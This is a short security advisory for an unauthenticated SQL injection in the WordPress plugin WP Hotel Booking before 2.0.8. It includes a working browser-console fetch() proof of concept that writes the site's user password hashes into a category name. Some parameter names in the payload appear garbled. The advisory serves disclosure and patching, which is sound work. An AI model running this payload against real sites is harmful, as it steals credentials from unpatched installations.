WP Hotel Booking < 2.0.8 - Unauthenticated SQLi

Description The plugin does not have authorisation and CSRF checks, as well as does not escape user input before using it in a SQL statement of a function hooked to admin_init, allowing unauthenticated users to perform SQL injections

PoC

Run the below command in the developer console of the web browser while being on the blog unauthenticated fetch(“/wp-admin/admin-ajax.php”, {“headers”: {“content-type”: “application/x-www-form-urlencoded; charset=UTF-8”},“body”: 'action=x&taxonomy;=hb_room_type&hb;_room_type_ordering[1]=0 END, name=(SELECT GROUP_CONCAT(user_pass) FROM wp_users), term_id=CASE when 1=1 THEN 1 ',“method”: “POST”}); The above will set the name of the 1st category name (see in the backend as admin) to GROUP_CONCAT of user passwords (even though the request will result in an error 400)